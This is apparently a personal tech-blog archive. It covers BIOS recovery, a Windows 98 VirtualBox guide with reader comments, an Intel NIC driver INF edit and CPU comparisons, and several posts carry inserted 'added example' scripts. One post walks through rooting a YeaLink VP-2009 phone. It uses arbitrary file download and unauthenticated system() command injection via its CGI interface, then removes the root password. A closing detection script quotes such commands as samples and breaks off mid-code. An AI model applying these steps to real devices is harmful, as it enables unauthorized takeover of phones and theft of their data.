Updates from January, 2019

  • duncanbowring 10:58 on January 12, 2019 Permalink | Reply  

    Dell R210 II BIOS Update Bricked 

    Broke my old Dell R210 II doing a BIOS update. Managed to fix it by flashing the chip directly.

    In the case of the R210 II, I used:

    CH341A USB Programmer (https://www.amazon.com/gp/product/B01I1EU9LG)

    SOIC8 Chip Clip (https://www.amazon.com/gp/product/B00V9QNAC4)

    CH341A Programmer software (free)

    The toughest part was finding the 8MB flash binary within the Dell downloads.

    The flash image start header is FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5AA5F00F. I searched for that [using a hex editor] and then selected a length of 0x800000 (8MB), which is the end of the file here. I dumped it to a new file, then flashed that new .bin to the BIOS. First I tried to use the OEM EXE, but it was a weird length. I ended up extracting the installer and using the file that was in the payload directory.

    Result! Back in business.
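
The carve described in this post, as an added example (not the author's tooling or Dell's): it finds the header quoted above, refuses to guess when there are zero or several matches, and cuts exactly 0x800000 bytes. The function names and the constructed sample payload are assumptions made for the example.

```python
import hashlib
import sys
from dataclasses import dataclass

# Header quoted in the post: 16 bytes of 0xFF, then 5A A5 F0 0F
# (Intel flash descriptor signature 0x0FF0A55A, little-endian on disk).
HEADER = bytes.fromhex("FF" * 16 + "5AA5F00F")
IMAGE_SIZE = 0x800000  # 8MB image length given in the post


@dataclass
class Carved:
    offset: int    # where the header starts inside the container file
    trailing: int  # bytes left in the container after the image (0 in the post)
    sha256: str    # digest to compare with a read-back of the chip after flashing
    image: bytes


def find_headers(blob: bytes) -> list:
    """Return every offset at which the image header occurs."""
    hits, pos = [], blob.find(HEADER)
    while pos != -1:
        hits.append(pos)
        pos = blob.find(HEADER, pos + 1)
    return hits


def carve(blob: bytes, size: int = IMAGE_SIZE) -> Carved:
    """Cut `size` bytes starting at the single header match, or refuse."""
    hits = find_headers(blob)
    if len(hits) != 1:
        # Zero hits: wrong file. Several hits: do not guess which one to flash.
        raise ValueError("expected one header, found %d at %s"
                         % (len(hits), [hex(h) for h in hits]))
    start = hits[0]
    image = blob[start:start + size]
    if len(image) != size:
        # A short image would leave part of the chip unwritten.
        raise ValueError("only %#x bytes after header, need %#x"
                         % (len(image), size))
    return Carved(start, len(blob) - (start + size),
                  hashlib.sha256(image).hexdigest(), image)


def make_sample(prefix_len: int = 0x1234, size: int = IMAGE_SIZE) -> bytes:
    """Constructed stand-in for an extracted payload file: padding + image."""
    return bytes(prefix_len) + HEADER + bytes(size - len(HEADER))


if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: carve.py <payload file> <output .bin>
        with open(sys.argv[1], "rb") as f:
            result = carve(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(result.image)
    else:  # no arguments: run on the constructed sample
        result = carve(make_sample())
    print("offset=%#x trailing=%d sha256=%s"
          % (result.offset, result.trailing, result.sha256))
```

Reading the chip back after programming and comparing its SHA-256 with the printed digest confirms the write before the board is powered up.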

  • duncanbowring 16:09 on April 22, 2016 Permalink | Reply
    Tags: ASCII, Diagrams, DITAA, Dokuwiki, Visio, Wiki   

    ASCII Flowcharts 

    You can generate this:

    Screen Shot 2016-04-22 at 11.59.58 PM

    From this:

    Screen Shot 2016-04-22 at 11.59.18 PM.png

    But create it visually, by using this (http://asciiflow.com):

    Screen Shot 2016-04-23 at 12.03.03 AM.png

    The Java based tool that generates the bitmap image from the ASCII graph is called DITAA (DIagrams Through Ascii Art) (http://ditaa.sourceforge.net/).

    I personally use the ditaa plugin for Dokuwiki to embed flowchart diagrams into my Dokuwiki hosted documentation. Dokuwiki is a decently powerful wiki software similar to Mediawiki, etc. One major difference is that it uses flat files instead of an RDBMS. You can use either the flat file standard setup or the Git Backed plugin to have it as part of the SCM. Makes for much easier management and automatic documentation generation!

    Screen Shot 2016-04-23 at 12.07.01 AM.png

     

     
  • duncanbowring 01:21 on December 4, 2015 Permalink | Reply
    Tags: 98se, Gaming, oldskool, virtualbox, win98

    Windows 98SE on VirtualBox (with video and audio drivers) 

    Screen Shot 2015-12-04 at 1.00.52 AM

    Why do this?

    If you feel nostalgic for a bit of Windows 9x action, or you just want to play some old games that are between DOS and Windows XP, you can either build a retro PC gaming rig, or you can test the water with VirtualBox.

    Once it’s all done, you too can see how pointless it all is. 🙂

    What you will need:

    • Windows 98SE ISO (unfortunately, I can’t help you here)
    • SCITech Display Doctor (this will be the video driver) – https://docs.google.com/file/d/0BycgkMZbeQOzWXE5NUhnWGRycVE/edit?pli=1
    • VirtualBox (https://www.virtualbox.org/wiki/Downloads)
    • Optional downloads are available and listed in each section below.

    Create the VM and Install Windows 98 SE

    1. Create new VM on Virtualbox Screen Shot 2015-12-03 at 10.50.03 PM
      • Type: Microsoft Windows
      • Version: Windows 98
      • RAM: 64MB
      • Create new fixed size HDD – 2GB (VDI is fine)
    2. Install Windows 98SE
      1. Boot with your 98SE ISO mounted (you’ll have to find this yourself)
      2. Boot with option 2 – Start computer with CD-ROM support Screen Shot 2015-12-03 at 10.53.04 PM
      3. Run fdisk and accept all the defaults to create a 2GB partition on your virtual drive.
      4. Restart the virtual machine
      5. Boot with option 2 – Start computer with CD-ROM support
      6. Format the virtual drive using format on the Windows CD
        • D:\win98\format c:
      7. Run: D:\setup.exe /ie /im /is /nr
        • /ie Disables create a boot disk (causes crashing on VBox and 98SE installer)
        • /im Disables checking conventional RAM
        • /is Disables scandisk
        • /iv Don’t disable billboards
        • /nr Disable registry check
      8. Run through the Windows installer with all the defaults Screen Shot 2015-12-03 at 11.01.46 PM
      9. After reboot – Boot from Hard Disk
      10. Enter your name and the CD key for Win98SE (98 key works too btw); install will continue.
      11. If everything went well, you should see Windows 98 desktop and hear some tragic music. 🙂

    Install Video Driver

    1. Shutdown Windows (and the VM)
    2. Edit Settings of the VM -> Storage -> Add another device to the IDE controller (click the CD with the green plus) and mount the scitech-display-doctor-7.iso file you downloaded earlier. Screen Shot 2015-12-03 at 11.13.20 PM
    3. You should see a CD drive with Sdd7 – double click that then run the scitech-display-doctor-win-7.0 installer – Express installation is fine. Screen Shot 2015-12-03 at 11.14.52 PM
      • You will eventually need to register the software. Unfortunately, it’s not sold anymore, but it is trivial to find a serial number for this via your favorite search engine.
    4. OS will restart, when it returns, SciTech Display Doctor will load. Either register it or start the 21 day trial.
    5. On the HOME page, underneath Current Configuration, there is a section called Active Features. Click ‘Disabled’ next to SciTech Display Driver then select SciTech Nucleus Driver and apply. Screen Shot 2015-12-03 at 11.19.00 PM
    6. OS will reboot again (remember how annoying this used to be?)
    7. SciTech reloads and you’ll see that VESA VBE 2.0 Oracle VM VirtualBox VBE Adapter is now selected. Screen Shot 2015-12-03 at 11.25.29 PM
    8. Minimize the window, right click Desktop then Properties then Settings
      • Here you should see Default Monitor on SciTech Display Doctor 7.0
    9. Change Colors to 16bit, apply, it’ll reboot again!
      • I’ve had issues trying to change resolution at the same time.
      • I’ve also had issues when the restart didn’t work – if so, restart the VM yourself – no need to go into safe mode, it should boot the second time OK.
    10. Right click Desktop -> Properties -> Settings; now you can select 1024×768 no problem.
    11. Hello accelerated Windows desktop!

    Configure for (broken and basic) Internet access (NAT)

    This will allow you to access the Internet, albeit in a basic and broken way.

    1. Start -> Settings -> Control Panel -> Internet Options -> Connections -> Setup
      1. I want to set up my Internet connection manually … or local area network (LAN).
      2. I connect through a local area network (LAN).
      3. Accept everything except for setting up a mail account.
      4. Internet Explorer 5 will load. I recommend that you download Opera 9.64 (Opera 10 and above doesn’t support Windows 9x) – http://www.oldversion.com/windows/opera-9-64
      5. Firefox 2 also works, but I found it was about as useful as IE5.
      6. Windows Update is long dead.

    Install DirectX8.1b (optional step)

    1. If you installed Opera 9.6 earlier, this is compatible enough to grab the file directly from the web via http://www.falconfly.de/directx.htm
    2. You will also need WinZip – grab this from http://www.bestweb.net/assistance/win95/winzip/
    3. Extract and install (via dxsetup.exe) the DirectX8.1b redistributable.
    4. Windows will reboot and you will now have DirectX 8.1 installed – you can verify this by running C:\windows\system\dxdiag.exe Screen Shot 2015-12-04 at 12.19.34 AM

    Install AC97 soundcard (optional step)

    The default VM setting is SoundBlaster 16 compatible. You can use the Windows Midi Synth, but I’ve seen some issues with games. In turn, we can use 9x drivers for AC97.

    1. If you installed Opera 9.6, head over to http://www.realtek.com.tw -> Downloads -> AC’97 Audio Codecs (Software) -> Windows 95 for Driver only.
    2. Install file then instead of rebooting Windows, choose reboot later then shut down the VM.
    3. Head into Virtualbox VM settings -> Audio and change the Audio Controller from Soundblaster 16 to ICH AC97
    4. Boot the VM up, it’ll detect the AC’97 audio – install the driver then reboot again Screen Shot 2015-12-04 at 12.28.45 AM
    5. Should have audio and wavetable MIDI when it returns.
    6. You can test this by running C:\windows\system\dxdiag.exe again.

    Screen Shot 2015-12-04 at 12.45.49 AM

    Testing a Game

    C&C Gold 95 doesn’t seem to work – will investigate further without dx8.1 since it comes with dx3.

     

    Civilization 2 Ultimate Collection – works perfect (dx5 game)

     
    • saxbophone 09:57 on April 19, 2017 Permalink | Reply

      Thanks for this, I’m sure I’ll find it very helpful when I have a crack at installing win98 in a VM soon. I assume this will work just fine with a real installation CD too? From what I have gathered, VirtualBox supports booting directly from a real CD as well..?

    • saxbophone 15:16 on April 20, 2017 Permalink | Reply

      Thanks, this guide was very helpful, all working. Now to begin retro computing adventures! 😀

    • James 16:05 on April 30, 2017 Permalink | Reply

      Every time I try installing SciTech after selecting the Scitech driver and restart I get a Windows Protection Error. You need to restart your computer. and no matter what I do I can’t get into windows except safe mode, but when I go into that I can’t do anything with SciTech. It just says I need to restart. I’ve tried this several times on fresh installs and it always comes back with this error. I have also seen BSOD after installing it.
      Any thoughts?

      Thanks!

    • Zack 13:13 on May 1, 2017 Permalink | Reply

      After enabling the SciTech Display Driver, when I try to reboot it stops on a black screen with the message, “Windows protection error. You need to restart your computer.” Any ideas? I’ve tried restarting the machine several times and can’t get past that error. It appears right after the Windows 98 boot screen.

      • Zack 13:26 on May 1, 2017 Permalink | Reply

        Well, I figured it out. I disabled PAE and VT-x, which fixed the problem

    • max 12:08 on May 19, 2017 Permalink | Reply

      Does this work with Win95? I’m trying everything to make it work on it and every time I finish with a bsod and a whole crash of virtualbox while it works fine on a win98…

    • Brandon 15:18 on September 17, 2017 Permalink | Reply

      Hello, I am having trouble with an issue after installing sdd. After I attempt to activate the nucleus driver, windows boots into a DOS style screen that simply says “Windows protection error. You must restart your computer.” I was hoping that you may know why this is happening.

    • AnonymousShithole 08:47 on November 13, 2017 Permalink | Reply

      Doesn’t work on Virtualbox ver. 5.1.22 r11512, Windows Protection Error — Restart your computer, happened after I enabled the Nautilus drivers and restarted, safe mode works, so it’s probably the driver.

    • Yep 11:09 on December 11, 2017 Permalink | Reply

      Thank you! it works!

    • Jim 15:51 on January 11, 2018 Permalink | Reply

      Just wanted to say thanks for this, you were a huge help. Been wanting to set up a virtual machine to play a bunch of old 90’s PC games for a while now but I just needed a tutorial like this to get it right and now I’m running them like a dream.

    • Sean Gibbons 22:04 on August 4, 2018 Permalink | Reply

      Thank you for the wonderful guide.
      The only section I can’t get to work is for the AC97 Soundcard. The Windows 95 Driver file from Realtek gives a “For 95 Only” Error. I tried installing the Windows 98 version, but doesn’t seem to work.
      I’ll stick to the SoundBlaster for now, but my system now works aside from that.

    • Horst 16:09 on August 26, 2018 Permalink | Reply

      Hello nice and very useful article! I tried it and everything worked so far except the audio driver. When I try to install the realtek Driver “Windows 95 for Driver only” as you wrote in the article, the installing assistant tells me that this version is only compatible with Win 95.. I tried the other realtek driver for Win 98 but it did not work. Do you know a solution for that or how to make the Win 95 Driver work?

    • Fuck off 13:14 on November 3, 2018 Permalink | Reply

      Hey idiot, thanks for wasting my valuable time with a set of instructions that doesn’t work!!!!

      All I get when trying to install Windows 98 are Rundll32 illegal operation errors!!!!!

      I am so sick and tired of dipshits like you clogging up the internet with misinformation that makes it harder to actually find valuable information. Next time, just don’t! Leave it to the professionals that actually know what they’re doing to post things like this.

      • duncanbowring 20:55 on January 31, 2019 Permalink | Reply

        It was posted 3 years ago. I haven’t done it since.. you can see the screenshots. If you have a specific problem, post for other people how to fix it.

    • Marshall Hoff 11:30 on November 7, 2018 Permalink | Reply

      Winworldpc is a great place to download windows iso’s and other old software: https://winworldpc.com/product/windows-98/98-second-edition

      • duncanbowring 20:54 on January 31, 2019 Permalink | Reply

        I recommend using a sandbox hitting the site.. my web filter says:

        Host: winworldpc.com

        URL: http://winworldpc.com/

        Reason: Compromised – Web pages that have been compromised by someone other than the site owner, which appear to be legitimate, but house malicious code.

    • Adam 17:16 on December 27, 2018 Permalink | Reply

      I’ve got a problem when I’m downloading Opera or other programs at oldversion.com, it showed as .php. Please, I need some help.

      • duncanbowring 03:48 on December 28, 2018 Permalink | Reply

        I haven’t done this for a very long time because I use an old p4 gaming laptop for ~XP.

        Pi3 dosbox works well up and beyond the early to mid 90s

      • Sad old git 17:17 on January 4, 2019 Permalink | Reply

        Try downloading it with a modern pc then put it into an iso (or burn it to a physical dvd) and install in the VM that way.

      • Sad old git 05:10 on January 5, 2019 Permalink | Reply

        Actually just tried the d/l myself and although IE calls it a PHP file it’s actually an exemplary so just rename it to .exe and it will be ok.

        My problem is that any download I do with Opera is reported as corrupted when I try to open it!

    • Sad old git 16:56 on January 4, 2019 Permalink | Reply

      Had a fun afternoon installing 98, got the video driver working, seem to have lost ACPI in the process but no matter. Followed with a happy evening reminding myself of the joy of using 98 after 3.11 and 95. Got Borland Pascal for Windows working, made it say “Hello World”.

      Finally remembered how nice it was when XP came along and then went to bed wondering why I’d bothered :-}

    • Sad old git 17:09 on January 4, 2019 Permalink | Reply

      Oh, and regarding updates,

      This is a posted iso of an official MS security update rollout containing everything up to 2004:

      https://www.dropbox.com/s/lzdxagq4ag0r6yc/SUCD.ZIP?dl=0

      And this is an unofficial update package:

      http://m.majorgeeks.com/files/details/unofficial_windows98_se_service_pack.html

      • Sad old git 17:11 on January 4, 2019 Permalink | Reply

        Should mention that I have not yet tried either of those update packages. Use at your own risk (but hey, it’s a VM so worst case go back a snapshot).

        • Sad old git 07:40 on January 6, 2019 Permalink

          Have now tried both these update packages. The “Unofficial” one is a bit complicated and full of scary warnings. I did let it install the main “core” updates but wimped out on all its other options. The less nervous (or more foolhardy) may do better. I may try further options later and see what happens.

          The official MS update pack does indeed seem to be what it says it is and quickly and easily (well, after a typical number of reboots at least) installed a bunch of security updates, IE 6 and Direct x 9.0b and Windows Media Player 9.

          So there you are, your choice which if either you try but the official one seems good.

  • duncanbowring 17:39 on January 17, 2013 Permalink | Reply
    Tags: 82579V, Asus Rampage, Intel 82579V 2008 R2, Rampage IV Extreme, Windows server on X79   

    How To: Intel 82579V Gigabit Network Connection – Windows Server 2008 R2 

    Clearly Intel doesn’t want us to install server OS onto desktop motherboards nowadays.

    Look at your driver CD. Navigate to the PRO1000 folder; depending on whether you have 32bit or 64bit OS, you will then want either Win32 or Winx64 (not Win64 which is for Itanium).
    The choice for the next folder will depend on your OS; NDIS5x is Server2003 or XP, NDIS61 is Server2008 or Vista, NDIS62 is Server2008R2 or 7, I presume NDIS63 is for Windows 8, Server 2012.

    Copy the correct folder to your desktop.

    In either case once you have chosen the correct folder you need to find the .inf starting e1c ; so for Server 2008 R2 64bit it will be called e1c62x64.inf. Ensure you are doing this on the copy that now exists on your desktop.

    Open the file in notepad;

    ;******************************************************************************
    ; e1c62x64.INF (Intel 64-bit extension Platform Only,
    ; Windows 7 64-bit extension and Windows Server 2008 R2 64-bit extension)
    ;
    ; Intel(R) Gigabit Network connections
    ;******************************************************************************
    ;
    [Version]
    Signature = "$Windows NT$"
    Class = Net
    ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}
    Provider = %Intel%
    CatalogFile = e1c62x64.cat
    DriverVer = 06/21/2012,11.16.96.0
    [Manufacturer]
    %Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
    [ControlFlags]
    ExcludeFromSelect = \ 
     PCI\VEN_8086&DEV_1502,\ 
     PCI\VEN_8086&DEV_1503
    [Intel]
    [Intel.NTamd64.6.1.1]
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025
    [Intel.NTamd64.6.1]
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025

    If you look in [ControlFlags], you see that there are two device IDs listed. DEV_1502 and DEV_1503.
    If you go back to the new computer you built (with no NIC driver installed 🙂 ), in Device Manager, you should see “Ethernet Adapter” listed as an unknown device. Go into the Properties of that, then Details, Hardware Ids. Now, you see that the device should be DEV_1503. Great.

    Go back to the notepad file you have open. You can see that under the second section within [Intel] you don’t have anything listed for DEV_1503 under [Intel.NTamd64.6.1]. Ironically, every other section has Server 2008 R2 provided for. Sneaky Intel, sneaky.

    Anyway, copy and paste the two lines that provide for DEV_1503 in the [Intel.NTamd64.6.1.1] section to the new section, like above. Save the file.

    Go back to the other computer that still has device manager open (it might be the same computer..), click Driver -> Update Driver, then manually select the desktop location of your NDIS62 directory you copied and then edited.

    Driver should install successfully. Hit me up if your mileage varies.
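
The comparison done by eye in Notepad above, as an added example that is not Intel's or the author's code: it lists the entries of one models section whose hardware IDs are absent from another. The sample INF is constructed from the post's listing in its pre-edit state, and the function names are made up for the example.

```python
import re

# Constructed sample: the two models sections from the post's listing,
# abbreviated and shown as they would look before the DEV_1503 lines are pasted.
SAMPLE_INF = r"""
[Manufacturer]
%Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
[Intel.NTamd64.6.1.1]
; DisplayName Section DeviceID
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
[Intel.NTamd64.6.1]
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
"""


def parse_sections(text):
    """Map lower-cased section name -> list of non-comment lines."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an INF comment
        if not line:
            continue
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def hardware_ids(line):
    """Hardware IDs of one models entry: desc = install-section, id[, id...]."""
    if "=" not in line:
        return []
    fields = [f.strip() for f in line.split("=", 1)[1].split(",")]
    return [f.upper() for f in fields[1:] if f]


def lines_to_copy(text, reference, target):
    """Entries of [reference] whose hardware IDs are not listed in [target]."""
    sections = parse_sections(text)
    for name in (reference, target):
        if name.lower() not in sections:
            raise KeyError("section [%s] not found" % name)
    have = {hw for line in sections[target.lower()]
            for hw in hardware_ids(line)}
    return [line for line in sections[reference.lower()]
            if any(hw not in have for hw in hardware_ids(line))]


if __name__ == "__main__":
    for entry in lines_to_copy(SAMPLE_INF,
                               "Intel.NTamd64.6.1.1", "Intel.NTamd64.6.1"):
        print(entry)
```

Because `CatalogFile = e1c62x64.cat` covers the INF as shipped, the edited copy no longer matches its catalog hash, so the driver package signature will not verify during installation.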

     
  • duncanbowring 17:26 on January 8, 2013 Permalink | Reply
    Tags: Dell, Dell M610, Maxing out., Nehalem   

    Time to retire the Dell M610 blade? What’s next? 

    Westmere X5672 vs Nehalem X5570

    After analysis of Westmere vs Nehalem;

    The gains aren’t small, but neither are they substantial enough to motivate upgrading from Nehalem to Westmere – only in select cases will the gains be in the 40-50% range. Similarly, the power efficiency improvements are nice, but not profound compared to the prior generation.

    The clock-rate increase for the 95W TDP chips (including turbo boost) that can be used in the M610 is 3.2GHz to 3.6GHz (I lock my chips to 3.2GHz permanently by disabling all power management in the BIOS and I also disable hyperthreading. YMMV). You’re looking at a mathematical difference of 11%. The extra cost vs the gains support the original conclusion that the gains are not substantial enough to motivate the upgrade.

    The Nehalem architecture was kick-ass, and remembering back to my benchmarks in 2008/2009, I saw a thread for thread 30% increase in capability.

    If you’re looking at a multi-threaded application, you could see 20-40% increase in performance with the extra 2 cores. Perhaps virtualization would see the most benefit here. However, when you look at the price tag that STILL exists against the X5672 chips, it really looks less appealing than it could, if you were looking for a quick interim upgrade without replacing all your systems.

    Again, your mileage may vary. For me, this isn’t a large enough gain to even warrant picking up a couple of chips to test them.

    The Nehalem X5570

    Interestingly, from performance tuning my BIOS, my benchmark of the CPU resulted in interesting results compared to the one on CPU Benchmark’s website:

    My result was an aggregate score of: 10,232 for CPU Benchmark.
    The 2 results recorded on CPU Benchmark’s website: 6,025.

    I cannot delve deeper into the tests submitted to the website, but I can only assume that something was wrong with their setup.
    If I look at the Single Thread results for my CPU, it is completely (expectedly) destroyed by the Intel Ivy Bridge i7-3770k @ 3.5GHz. 70.1% faster. This is pretty impressive, and I think it warrants a further look into the modern CPUs and building a prototype system for further testing.

    Faster, Faster, Faster

    My initial research is showing that the best thread-for-thread CPU for applications that aren’t so multi-threaded seems to be the Intel® Xeon® Processor E3-1290V2 (8M Cache, 3.70 GHz) with turbo boost of 4.10GHz. It’s a 4 core chip with 8 threads (HT) on the 22nm lithography and only 87W TDP (wow!). Unfortunately, it looks like it will not accept a multi-CPU configuration system. This might not be a problem for me.

    Since I’m in the mix, I’m also looking at the Core i7-3770K 3.5GHz (3.9GHz turbo) chip. I bet this will run stable at 4.10GHz without much trouble. I understand it’s a desktop CPU, but the price alone makes it worth a second look – especially if I’m thinking about self building. Clock for clock, thread for thread, this looks like a great chip. It holds its own against the E3-1290V2 at a fraction of the price. I have a 2600k at home stable for over a year at 4.5GHz.

    A side by side of these two chips. They’re pretty similar.

    Intel Core i7-3770K Intel Xeon E3-1290 v2
    Specifications differences
    Market segment Desktop Server
    Manufacturer Intel
    Family Intel Core i7 Intel Xeon
    Model number i7-3770K E3-1290 v2
    CPU part number CM8063701211700 CM8063701099101
    Box part number BX80637I73770K
    BXC80637I73770K
    Core name Ivy Bridge Ivy Bridge-H2
    Platform name Carlow
    Microarchitecture Ivy Bridge
    Technology (micron) 0.022
    Socket Socket 1155
    Frequency (MHz) 3500 3700
    Turbo Frequency (MHz) 3900 / 3900 / 3800 / 3700 4100 / 4000 / 3900 / 3800
    Clock Multiplier 35 37
    L1 cache 128 KB (code) / 128 KB (data)
    L2 cache (KB) 1024
    L3 cache (KB) 8192
    TDP (Watt) 77 87
    Cores 4
    Multiprocessing 1
     
  • duncanbowring 03:57 on April 23, 2012 Permalink | Reply
    Tags: Rooted, VOIP, VP-2009, YeaLink   

    YeaLink VP-2009 VOIP/Video Phone – r00ted, here’s how.. 

    Awesome phone. Not so awesome code. It took me the best part of 6 hours, but I rooted the bitch. Guide to come!

    Now, I just need to see what security risk this poses to me since I now use these phones professionally. Be careful if you use these in your office! At least it’s not so easy to change the actual phone software. It’s a compiled ARM binary. Pity, would have been nice to write custom modules for it. I think it uses some strange XML interface to display content, might be a way to make that display web content of your own choice.

    Image

    Rough guide:

    view-source:192.168.1.114/cgi-bin/cgiServer.exx?

    <html>
    <head>
    <title>syntax error</title>
    </head>
    <body>
    Unkonw GET type : useage ?[page/download/command]=xxx
    <br>
    </body>
    </html>

    Oh look, I can download any file from the phone.

    Hmm.. command? What is command? Well, we can grab the syslog and see what goes on in there..

    Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)

    Interesting! Alright, so I dig through their web code and I find:

    function _SendMessage(thread, uMsg, wParam, lParam)
    {
            return "msgSendMessage(\"" + thread + "\",\"" + uMsg + "\",\"" + wParam + "\",\"" + lParam + "\")";
    }

    I test that via URL, and it works. I think. No errors.

    What else do I see here..

    function _getFreeSpace(strpath)
    {
            return "getFreeSpace(\"" + strpath + "\")";
    }

    Aha, this works too. With any path, via URL.

    However, here’s the money shot right here.. interesting command:

    function _system(cmd)
    {
            return "system(\"" + cmd + "\")";
    }

    I see they make calls to it internally:

    function doReboot()
    {
            //var formInput = document.formInput;
            if(xmlHttpGet(_SendMessage("app_vpPhone", "0xa8004", 0, 0)) == "1")
            {
                    alert("Talking, Please save config later.");
                    return;
            }
            if(confirm(" Do you want to reboot device?"))
            {
                    jsShowPageStatus("main-content","Rebooting , please wait ...", "server-status");
                    xmlHttpPostAsyn(_system("reboot >/dev/null 2>&1"), responseXmlHttp);
                    return;
            }
    }

    So, let’s try reboot.. I execute the reboot command via the browser. Boom, it reboots.

    After hours of screwing around and banging out recursive ls, df, contents of files, touching new files.. I figure out that they obfuscate user permissions for /etc/

    Extract:

    1 -rwxr-xr-x    1 1011     1002          601 May 13  2011 passwd
    0 -rwxr-xr-x    1 1011     1002           31 May 13  2011 issue.net
    0 -rwxr-xr-x    1 1011     1002          452 May 13  2011 nsswitch.conf
    0 -rwxr-xr-x    1 1011     1002          421 May 13  2011 inputrc
    2 drwxr-xr-x    1 1011     1002         2048 May 13  2011 dhcpc
    0 -rwxr-xr-x    1 1011     1002           26 May 13  2011 host.conf
    3 -rwxr-xr-x    1 1011     1002         2921 May 13  2011 inetd.conf

    Still doesn’t explain why I cannot rm files I’ve created in /tmp or append with echo. I can only create with echo or touch!

    Numerous attempts to add a user don’t work. The commands just don’t exist.
    I look at the files I create with touch and oh dear oh dear, they’re created by root. No chroot ! Or even running as an unprivileged user!

    I chown passwd to root:root and then I run passwd -d to remove password. I overwrite MOTD prior to this as a test, hence the ‘test’.

    BAM, I’m in.

    Footnote: Now I’ve firewalled this interface off from the rest of the users on my network. Don’t want anyone snooping in on private phone stuff!
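
The syslog line quoted above shows that mini_httpd records the query string, so the same log can be used to spot this CGI interface being driven from the network. An added detection example, not part of the original post: the first sample line is the one from the post, the others are constructed on the assumption that other GET queries are logged the same way, and the sensitive path prefixes are assumptions.

```python
import posixpath
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Line 1 is the syslog entry quoted in the post. Lines 2-4 are constructed in
# the same format, on the assumption that other GET queries are logged alike.
SAMPLE_LOG = """\
Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)
Mar 29 10:43:02 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=system(%22reboot%20%3E/dev/null%202%3E%261%22)
Mar 29 10:43:40 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:download=/config/user/voip/sipAccount0.cfg
Mar 29 10:44:05 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=getFreeSpace(%22/tmp%22)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]{8})\s+mini_httpd\[\d+\]:\s+[^:\s]+:"
    r"path:(?P<path>[^,]*),query:(?P<query>.*)$")
CALL_RE = re.compile(r"^(?P<fn>\w+)\((?P<args>.*)\)$", re.S)
CGI_PATH = "/cgi-bin/cgiServer.exx"
# Assumption: directories whose contents should never leave the phone over HTTP.
SENSITIVE_PREFIXES = ("/etc/", "/config/")


@dataclass
class Finding:
    ts: str
    severity: str  # "high", "medium" or "info"
    kind: str      # "command" or "download"
    detail: str    # decoded call or requested path


def classify(query):
    """Return (severity, kind, detail) for one cgiServer.exx query string."""
    key, _, value = query.partition("=")
    value = unquote(value)
    if key == "command":
        call = CALL_RE.match(value)
        fn = call.group("fn") if call else ""
        # Per the post, system() runs its argument as root on this phone.
        return ("high" if fn == "system" else "info", "command", value)
    if key == "download":
        # Collapse ../ first so /tmp/../etc/passwd is still scored as /etc/.
        norm = posixpath.normpath(value) + "/"
        hit = norm.startswith(SENSITIVE_PREFIXES)
        return ("high" if hit else "medium", "download", value)
    return None  # page=... and anything else is not scored here


def scan(log_text):
    """Return a Finding for every scored cgiServer.exx request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
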